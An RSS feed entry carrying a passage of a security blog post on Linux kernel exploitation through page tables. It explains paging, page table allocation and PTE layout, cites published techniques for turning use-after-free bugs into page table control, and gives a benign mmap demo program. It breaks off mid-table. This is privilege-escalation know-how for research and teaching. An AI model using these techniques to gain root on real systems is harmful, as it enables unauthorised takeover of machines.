<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>sam4k</title><description>blogging about pwning kernels and os internals</description><link>https://sam4k.com/</link><atom:link href="https://sam4k.com/rss/" rel="self" type="application/rss+xml"/><generator>Hugo</generator><language>en-us</language><image><url>https://sam4k.com/content/images/2021/07/linux.png</url><title>sam4k</title><link>https://sam4k.com/</link></image><lastBuildDate>Wed, 07 May 2025 14:01:41 +0000</lastBuildDate><ttl>60</ttl><item><title>Kernel Exploitation Techniques: Turning The (Page) Tables</title><description>This post explores attacking page tables as a Linux kernel exploitation technique for gaining powerful read/write primitives.</description><link>https://sam4k.com/page-table-kernel-exploitation/</link><guid isPermaLink="false">67fbb9eb752e23048bb85792</guid><category>linux</category><category>kernel</category><category>memory</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Wed, 07 May 2025 14:01:41 +0000</pubDate><media:content url="https://sam4k.com/content/images/2025/07/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<p>Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.</p>
<p>So today we&rsquo;ll be looking at (user) page table exploitation. If you&rsquo;ve been keeping up with some of the great kernel exploitation research put out there lately (of which I will be sharing plenty of in this article, don&rsquo;t worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.</p>
<p>The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We&rsquo;ll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and mitigations to be aware of.</p>
<p>As I mentioned, there&rsquo;s a plethora of great research out there, so where relevant I&rsquo;ll be linking to them so you can take a deeper dive into specific topics or approaches. At the end of the post I&rsquo;ll include a section grouping all the relevant public research together.</p>
<p>So without further ado, let&rsquo;s get stuck in!</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#paging-primer">Paging Primer</a></li>
<li><a href="#exploitation">Exploitation</a>
<ul>
<li><a href="#user-page-table-allocation">User Page Table Allocation</a></li>
<li><a href="#page-table-corruption">Page Table Corruption?</a>
<ul>
<li><a href="#page-level-primitives">Page-Level Primitives</a></li>
<li><a href="#what-about-other-primitives">What About Other Primitives?</a></li>
</ul>
</li>
<li><a href="#exploiting-a-page-uaf">Exploiting A Page UAF?</a>
<ul>
<li><a href="#pt-entries">PT Entries</a></li>
<li><a href="#huge-pages">Huge Pages</a></li>
<li><a href="#going-for-a-walk">Going For A Walk</a></li>
<li><a href="#approaches">Approaches</a></li>
<li><a href="#on-caching">On Caching</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#physical-kaslr">Physical KASLR</a></li>
<li><a href="#read-only-memory">Read-Only Memory</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<h2 id="paging-primer">Paging Primer</h2>
<p><img src="https://sam4k.com/content/images/2025/05/what_am_i_looking_at.gif" alt=""></p>
<p>he&rsquo;s looking at pages, get it?</p>
<p>Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what pages tables are so we understand why exploiting them is so powerful.</p>
<p>Let&rsquo;s pick up where we left off with my <a href="https://sam4k.com/linternals/#virtual-memory">three-part series on virtual memory</a>; if you&rsquo;re not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section.</p>
<p>Okay, so, we have this general idea of the virtual memory model. Let&rsquo;s take the simple example of running a program, which we&rsquo;ve <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/#what-is-memory-management">touched on previously</a>:</p>
<ul>
<li>First, the program itself is stored on disk and must be read</li>
<li>It is loaded into RAM, where the physical address in memory is mapped into our process&rsquo; virtual address space</li>
<li>This &ldquo;mapping&rdquo; means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed</li>
</ul>
<p>Page tables are what facilitate the translation of virtual to physical addresses. Why &ldquo;page&rdquo; tables? <a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">Recall</a> that virtual memory is divided into &ldquo;pages&rdquo; which are <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18"><code>PAGE_SIZE</code></a> (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.</p>
<p>Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?</p>
<p>Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels<a href="https://docs.kernel.org/mm/page_tables.html">[1]</a>:</p>
<ul>
<li>Page Global Directory (PGD): Each entry in this table points to a P4D</li>
<li>Page Level 4 Directory (P4D): Each entry in this table points to a PUD</li>
<li>Page Upper Directory (PUD): Each entry in this table points to a PMD</li>
<li>Page Middle Directory (PMD): Each entry in this table points a PT</li>
<li>Page Table (PT): Each entry (PTE) points to a page of physical memory</li>
</ul>
<p>Note that a lot of systems may still use 4 level page tables. In the event a page table level isn&rsquo;t used (i.e. P4D is only used for 5 level page tables), it is &ldquo;folded&rdquo; AKA skipped.</p>
<p>Okay, that sounds fairly straight forward right? And to add to the page-ception, each of these tables is a <code>PAGE_SIZE</code> bytes. But how does these facilitate address translation?</p>
<p><img src="https://sam4k.com/content/images/2025/05/image-1.png" alt=""></p>
<p>Overview of page table structure (Linux x86_64) by <a href="https://www.researchgate.net/scientific-contributions/Hiroki-Kuzuno-2166786557">Hiroki Kuzuno</a>, <a href="https://www.researchgate.net/profile/Toshihiro-Yamauchi-2">Toshihiro Yamauchi</a> <a href="https://www.researchgate.net/figure/Overview-of-page-table-structure-Linux-x86-64-architecture-in-22_fig1_353593783">[1]</a></p>
<p>That&rsquo;s where this helpful diagram comes in! Let&rsquo;s unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.</p>
<p>Looking up, we have see the bits that make up a 64-bit x86_64 virtual address. We can see that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn&rsquo;t that neat?!</p>
<p>There&rsquo;s a few extra details to note here. First, keen readers might notice that we&rsquo;re actually only using the lower 47 bits of the virtual address! What&rsquo;s that <code>Sign extended</code> portion? As addresses are canonically 64-bits (i.e. that&rsquo;s how they&rsquo;re treated and handled), the remaining bits 48-63 are sign extended (i.e. copy) bit 47.</p>
<p>This bit is important, as it denotes if an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don&rsquo;t believe me? Compare a kernel and userspace address on your x86_64 machine and you&rsquo;ll always see those bits set/unset.</p>
<p>Some more useful bits (figuratively speaking) worth mentioning are that:</p>
<ul>
<li>Page table entries aren&rsquo;t just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert).</li>
<li>It&rsquo;s not just PTEs that can point to physical memory. There&rsquo;s a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).</li>
<li>The kernel&rsquo;s page tables are setup at boot time. A process&rsquo; page tables are setup when it&rsquo;s created. It used to be the case that the kernel&rsquo;s page tables were copied into each process&rsquo; tables (remember, they span a mutually exclusive virtual address range).</li>
<li>However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, <code>[CONFIG_PAGE_TABLE_ISOLATION](https://cateee.net/lkddb/web-lkddb/PAGE_TABLE_ISOLATION.html)</code> / <code>[CONFIG_MITIGATION_PAGE_TABLE_ISOLATION](https://cateee.net/lkddb/web-lkddb/MITIGATION_PAGE_TABLE_ISOLATION.html)</code>) was introduced. This removes the kernel mappings from userspace, switching to a separate page table will all the mappings when entering &ldquo;kernel mode&rdquo; (i.e. during a syscall, interrupt).</li>
</ul>
<p>I&rsquo;ll touch on all of this in much more detail in the next instalment of my memory <a href="https://sam4k.com/linternals/#memory-management">management linternals series</a>, but there&rsquo;s also plenty of great resources out there<a href="https://docs.kernel.org/mm/page_tables.html">[1]</a><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">[2]</a>.</p>
<hr>
<ol>
<li><a href="https://docs.kernel.org/mm/page_tables.html">https://docs.kernel.org/mm/page_tables.html</a></li>
<li><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md</a></li>
</ol>
<h2 id="exploitation">Exploitation</h2>
<p><img src="https://sam4k.com/content/images/2025/05/the_good_part.gif" alt=""></p>
<p>Alright, now we&rsquo;re getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target.</p>
<p>Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to.</p>
<p>When we think of Kernel Address Space Layout Randomisation (KASLR), we&rsquo;re typically thinking about the virtual address of the kernel. Physical KASLR is slightly different and may not always be present (in the case of upstream <code>aarch64</code>) or weaker.</p>
<p>Therefore, control over a PTE belonging to our process essentially grants us an arbitrary physical address read and write, granting control over the kernel while also bypassing mitigations that hinder other techniques.</p>
<p><img src="https://sam4k.com/content/images/2025/05/image-2.png" alt=""></p>
<p>But of course, this is all easier said than done! First we have to control a PTE&hellip;</p>
<p>So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:</p>
<ul>
<li>How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to corrupt them</li>
<li>Are there generic approaches to gain a page table corruption primitive?</li>
<li>How do we want to leverage our page table corruption for local privilege escalation?</li>
</ul>
<h3 id="user-page-table-allocation">User Page Table Allocation</h3>
<p>If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel&rsquo;s page tables are setup during boot-time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.</p>
<p>I&rsquo;ll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: whenever a virtual address is accessed (read or written) and has a valid physical memory mapping, any missing page tables will be allocated and populated.</p>
<p>We can use some maths to guarantee this. Recall that each page table is <code>PAGE_SIZE</code> bytes. On a 64-bit system, entries are 64-bits. That means each page table has <code>4096 / 8 = 512</code> entries. We can then work out the virtual address range of each page table level:</p>
<ul>
<li>PTE-level table: Each of the 512 entries points to <code>PAGE_SIZE</code> bytes of physical memory. Therefore it spans <code>512 x 4096 = 2097152 = 0x200000 = 2MB</code>.</li>
<li>Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans <code>0x40000000 = 1GB</code></li>
<li>This continues with the PUD spanning 512GB, the PGD spanning 256TB.</li>
</ul>
<p>We can infer from this that the virtual address of the first entry of a PTE-level table is aligned to <code>0x200000</code>. If we <code>mmap()</code> a page of anonymous memory to a fixed address, aligned to this value we can determine a few things:</p>
<ul>
<li>This virtual address&rsquo; mapping will be the first entry in its PTE-level table</li>
<li>If there haven&rsquo;t been any other mappings in this page table (i.e. for the next <code>0x200000 - 0x1000</code> bytes), then this page table hasn&rsquo;t been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.</li>
</ul>
<p>Another quirk to note is that <code>mmap()</code> can be passed the <code>MAP_POPULATE</code> flag to populate the necessary page tables at the time the mapping is created.</p>
<p>With that mildly relevant tangent out of the way, let&rsquo;s look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For <code>x86_64</code> our trail starts here:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">gfp_t</span> <span class="n">__userpte_alloc_gfp</span> <span class="o">=</span> <span class="n">GFP_PGTABLE_USER</span> <span class="o">|</span> <span class="n">PGTABLE_HIGHMEM</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">pgtable_t</span> <span class="nf">pte_alloc_one</span><span class="p">(</span><span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">__pte_alloc_one</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="n">__userpte_alloc_gfp</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>arch/x86/mm/pgtable.c</p>
<p>Note the GFP flags used: <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM</code>. A few calls deeper we then get to the <code>asm-generic</code> implementation, <code>pagetable_alloc_noprof()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/**
</span></span><span class="line"><span class="cl"> * pagetable_alloc - Allocate pagetables
</span></span><span class="line"><span class="cl"> * @gfp:    GFP flags
</span></span><span class="line"><span class="cl"> * @order:  desired pagetable order
</span></span><span class="line"><span class="cl"> *
</span></span><span class="line"><span class="cl"> * pagetable_alloc allocates memory for page tables as well as a page table
</span></span><span class="line"><span class="cl"> * descriptor to describe that memory.
</span></span><span class="line"><span class="cl"> *
</span></span><span class="line"><span class="cl"> * Return: The ptdesc describing the allocated page tables.
</span></span><span class="line"><span class="cl"> */
</span></span><span class="line"><span class="cl">static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
</span></span><span class="line"><span class="cl">{
</span></span><span class="line"><span class="cl">	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	return page_ptdesc(page);
</span></span><span class="line"><span class="cl">}
</span></span></code></pre></div><p>include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)</p>
<p>As we can see user page tables are allocated using the page allocator, with GFP flags <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP</code>. Okay, one step closer!</p>
<p>Now we know we&rsquo;re dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let&rsquo;s explore this a bit:</p>
<p><img src="https://sam4k.com/content/images/2025/05/phys_mem_mgmt.png" alt=""></p>
<p><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF slides</a> by PAN ZHENPENG &amp; JHENG BING JHONG</p>
<p>Above is a diagram showing some page allocator internals. <a href="https://sam4k.com/linternals-memory-allocators-part-1/#0x02-the-buddy-page-allocator">Recall</a> that the page allocator manages chunks of physically contiguous memory by <code>order</code>, where the size of the chunk is <code>2order * PAGE_SIZE</code>.</p>
<p>Free memory chunks are managed by the <code>free_area</code> list, whose index is the <code>order</code> of the free chunks of memory it manages. Each <code>order</code> then has a <code>free_list</code> for each of the <code>MIGRATE_TYPES</code>, which points to the actual memory chunks. Working our way back you&rsquo;ll then notice each zone has it&rsquo;s own <code>free_area</code> list&hellip; Not to mention each CPU maintains its own per-CPU page cache&hellip; So yeah, that&rsquo;s a lot.</p>
<p>This means when we&rsquo;re doing any kind of page allocator-level corruption we need to be aware of all the variables: the CPU cache, zone, migrate type etc.</p>
<p>In our situation: Our page table is <code>PAGE_SIZE</code> bytes, so a single order 0 page. The GFP flags determine the zone and migrate type. Let&rsquo;s quickly walk through those:</p>
<ul>
<li><code>GFP_PGTABLE_USER</code> after peeling back the macros is <code>__GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT</code>. No <code>__GFP_RECLAIMABLE|__GFP_MOVABLE</code> means no <code>MIGRATE_MOVABLE</code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">[3]</a>.</li>
<li><code>PGTABLE_HIGHMEM</code> is effectively 0 unless <code>CONFIG_HIGHMEM</code> is set.</li>
<li><code>__GFP_COMP</code> is for compound pages<a href="https://lwn.net/Articles/619514/">[4]</a>, but doesn&rsquo;t effect our zone/migrate type.</li>
</ul>
<p>So to sum it all up: page tables are order-0 pages allocated by the page allocator, from <code>ZONE_NORMAL</code>, <code>MIGRATE_UNMOVABLE</code>.</p>
<h3 id="page-table-corruption">Page Table Corruption?</h3>
<p><img src="https://sam4k.com/content/images/2025/05/tell_me_more.gif" alt=""></p>
<p>Okay, we know what page tables are, why they&rsquo;re powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!</p>
<p>The vulnerability research gods are fickle ones and we&rsquo;re often at the whims of the primitives we&rsquo;re given. So let&rsquo;s explore a few cases and how we might leverage them to get control of a page table.</p>
<h4 id="page-level-primitives">Page-Level Primitives</h4>
<p>By far the &ldquo;easiest&rdquo; way would be if we had a nice <strong>order-0 page use-after-free (UAF)</strong>, with suitable zone and migrate types. In this scenario, we could do some classic memory fengshui to have our page reallocated as a page table.</p>
<p>Even if it wasn&rsquo;t an order-0 page, due to the <a href="https://sam4k.com/linternals-memory-allocators-part-1/#buddy-system-algorithm">buddy algorithm</a>, if we exhaust the order-0 pages the allocator will split order-1 pages, if they&rsquo;re exhausted then order-2 and so on. A similar technique could be used to exploit a page allocator level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table.</p>
<p>I thought I&rsquo;d share some cool public research demonstrating this, funnily enough page-level UAFs aren&rsquo;t too common, so both examples are from GPU bugs:</p>
<ul>
<li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (aarch64)</li>
<li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (aarch64)</li>
</ul>
<h4 id="what-about-other-primitives">What About Other Primitives?</h4>
<p>But what if we don&rsquo;t have a nice page-level UAF? What if we&rsquo;ve got a run of the mill SLAB allocator-level UAF? Is there any hope for us?! Yes!</p>
<p>As an avid reader of my linternals series, I&rsquo;m sure you&rsquo;ll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator!</p>
<p>Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We&rsquo;d need to be mindful of the slabs <code>order</code> (aka size) and what write primitives we can get with our UAF in order to corrupt the page table&rsquo;s contents, but it&rsquo;s certainly do able.</p>
<p>How do I know? Because this is the crux of the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable technique</a> published by <a href="https://x.com/NVamous">@NVamous</a> back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!</p>
<p>In a similar vein, PageJack was published in 2024 (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen &amp; Zhiyun Qian. This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific &ldquo;bridge objects&rdquo; which when freed cause a page UAF.</p>
<p>Below are some more writeups demonstrating these techniques:</p>
<ul>
<li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&ldquo;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&rdquo;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (x86_64) (2023)</li>
<li><a href="https://pwning.tech/nftables/">&ldquo;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&rdquo;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> expands on the Dirty Pagetable technique (x86_64) (2024)</li>
</ul>
<h3 id="exploiting-a-page-uaf">Exploiting A Page UAF?</h3>
<p><img src="https://sam4k.com/content/images/2025/05/hacking.gif" alt=""></p>
<p>The pieces are finally aligned: we know what page tables are, why they&rsquo;re a big deal and now we even know how to get control of them &hellip; but what do we do with all this power?!</p>
<p>As I mentioned earlier, we&rsquo;re often at the whims at whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can&rsquo;t cover all eventualities, hopefully this section provides enough information to figure it out.</p>
<p>So we have a, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what&rsquo;s next?</p>
<h4 id="pt-entries">PT Entries</h4>
<p>First things first, we want to understand what we&rsquo;re corrupting - what does our page table <em>actually</em> contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve?</p>
<p><img src="https://sam4k.com/content/images/2025/05/x86_64_pte-1.png" alt=""></p>
<p>x86_64 PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></p>
<p>Above is a diagram of what an 8 byte PT entry looks like on x86_64. Here <code>M</code> is the maximum physical address bit, i.e. how many bits are used for addressing. As we touched one earlier, this isn&rsquo;t actually 64, but a small value such as 47.</p>
<p>So this is a pretty smart use of space. As we know, these entries map pages in memory (i.e. <code>PAGE_SIZE</code> bytes of memory), so all addresses are page aligned. With a page size of <code>0x1000</code>, this means the lower 0-11 bits are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.</p>
<p>Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our processes&rsquo; virtual address space. So we&rsquo;re interested in:</p>
<ul>
<li>The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.</li>
<li>The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table.</li>
</ul>
<h4 id="huge-pages">Huge Pages</h4>
<p>As we&rsquo;ve touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF.</p>
<p>Albeit, in their default usecase, this would be less practical than corrupting a PT. A PT would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables &hellip; Apart from huge pages!</p>
<p><img src="https://sam4k.com/content/images/2025/05/x86_64_pmd_pud.png" alt=""></p>
<p>x86_64 PUD, PMD and PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></p>
<p>The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (<code>PS</code>) attribute. If this bit is set, it is treated as mapping to a huge page of physical memory, who size is appropriate for the page-level.</p>
<p>As we covered earlier, for a PMD this is 2MB and for a PUD it&rsquo;s 1GB. As the physical addresses are aligned to the value of the physical mapping, we can see the PMD entry has even less address bits than the PT entry and the PUD even less than the PMD.</p>
<h4 id="going-for-a-walk">Going For A Walk</h4>
<p>So far this has been all quite abstract, so, if you&rsquo;ll indulge me, let&rsquo;s go for a quick (page table) walk. We&rsquo;ll take all the paging internals we&rsquo;ve picked up so far to do some debugging in order to get some hands on and confirm what we&rsquo;ve learned.</p>
<p>For our little walk, I&rsquo;m going to use the following program to setup an interesting virtual address space to explore via kernel debugging:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="cp">#define PAGE_SIZE (0x1000UL)
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PT_SIZE (512 * PAGE_SIZE) </span><span class="c1">// 0x200000
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PMD_SIZE (512 * PT_SIZE)  </span><span class="c1">// 0x40000000
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PUD_SIZE (512 * PMD_SIZE) </span><span class="c1">// 0x8000000000
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PGD_SIZE (512 * PUD_SIZE) </span><span class="c1">// 0x1000000000000
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="nf">open</span><span class="p">(</span><span class="s">&#34;test.txt&#34;</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">PUD_SIZE</span> <span class="o">+</span> <span class="n">PMD_SIZE</span> <span class="o">+</span> <span class="n">PT_SIZE</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">PUD_SIZE</span> <span class="o">+</span> <span class="n">PMD_SIZE</span> <span class="o">+</span> <span class="n">PT_SIZE</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">PUD_SIZE</span> <span class="o">+</span> <span class="n">PMD_SIZE</span> <span class="o">+</span> <span class="n">PT_SIZE</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">getchar</span><span class="p">();</span> <span class="c1">// pause program so i can set a bp to trigger on the next mmap()
</span></span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them</p>
<p>The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?</p>
<p>Because as we&rsquo;ve learned, the virtual address space is directly reflected by it&rsquo;s page tables. So by using a fixed address we can calculate exactly which PT our page entries will be.</p>
<p>To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address <code>0x0</code> is going to be mapped by <code>PGD[0][0][0][0]</code> - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.</p>
<p>So if we map at fixed address <code>PUD_SIZE + PMD_SIZE + PT_SIZE</code> we&rsquo;re offsetting it by example one PUD, one PMD and one PT. So we should find it at <code>PGD[1][1][1][0]</code>.</p>
<p>We can also do it the technical way and explore the bits of the address. <code>PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000</code>. Let&rsquo;s check out the bits:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
